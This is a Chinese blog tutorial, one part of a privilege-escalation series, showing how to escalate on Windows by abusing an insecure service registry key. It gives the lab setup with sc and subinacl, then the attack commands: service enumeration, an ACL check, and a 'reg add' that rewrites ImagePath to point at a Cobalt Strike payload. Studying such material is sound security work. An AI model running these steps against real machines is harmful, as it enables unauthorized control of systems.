操作系统权限提升(七)之系统错误配置-不安全注册表提权

系列文章

操作系统权限提升(一)之操作系统权限介绍
操作系统权限提升(二)之常见提权的环境介绍
操作系统权限提升(三)之Windows系统内核溢出漏洞提权
操作系统权限提升(四)之系统错误配置-Tusted Service Paths提权
操作系统权限提升(五)之系统错误配置-PATH环境变量提权
操作系统权限提升(六)之系统错误配置-不安全的服务提权

注:阅读本编文章前,请先阅读系列文章,以免造成看不懂的情况!!

不安全注册表提权

不安全注册表提权的原理

Windows的服务路径存储在Windows的注册表中,若注册表配置不当,当攻击者可以发现使用低权限可以更改注册表的选项的时候,就可以导致提权,可以将 imagepath 修改成恶意的文件,重启导致提权

操作系统权限提升(七)之系统错误配置-不安全注册表提权_第1张图片

提权环境准备

1、新建立一个服务,test

sc create test binpath= "C:\1.exe"

在这里插入图片描述
2、打开注册表给该文件权限

操作系统权限提升(七)之系统错误配置-不安全注册表提权_第2张图片
操作系统权限提升(七)之系统错误配置-不安全注册表提权_第3张图片

或者用工具

shell subinacl /keyreg "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /grant=apache=f

不安全注册表提权实战

1、先使用MSF或者CS上线靶机

操作系统权限提升(七)之系统错误配置-不安全注册表提权_第4张图片2、查询计算机中的所有服务

sc query type= all state= all |findstr /i service_name.* |more

操作系统权限提升(七)之系统错误配置-不安全注册表提权_第5张图片操作系统权限提升(七)之系统错误配置-不安全注册表提权_第6张图片3、使用subinacl进行查询提权

shell subinacl /keyreg "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /display

操作系统权限提升(七)之系统错误配置-不安全注册表提权_第7张图片
操作系统权限提升(七)之系统错误配置-不安全注册表提权_第8张图片
4、查询该服务的 imagepath 值

reg query HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test /v imagepath

操作系统权限提升(七)之系统错误配置-不安全注册表提权_第9张图片
5、查看上传的cs的恶意程序文件路劲并记录下来

操作系统权限提升(七)之系统错误配置-不安全注册表提权_第10张图片
6、替换该文件为恶意的文件或者修改文件的路径

reg add "HKEY_LOCAL_MACHINE\system\ControlSet001\Services\test" /t REG_EXPAND_SZ /v ImagePath /d "C:\Users\apache\Desktop\1.exe" /f

在这里插入图片描述7、查询是否替换

reg query HKEY_LOCAL_MACHINE\system\ControlSet001\services\test /v imagepath

操作系统权限提升(七)之系统错误配置-不安全注册表提权_第11张图片这里可以看到我们的服务路劲已经被篡改了

8、这个时候apache是没有权限启动服务的,需要管理员重启电脑

这里我们模拟管理员启动这个服务

sc strat test

在这里插入图片描述
9、提权成功
操作系统权限提升(七)之系统错误配置-不安全注册表提权_第12张图片

你可能感兴趣的:(操作系统权限提升,安全,windows,网络安全,网络)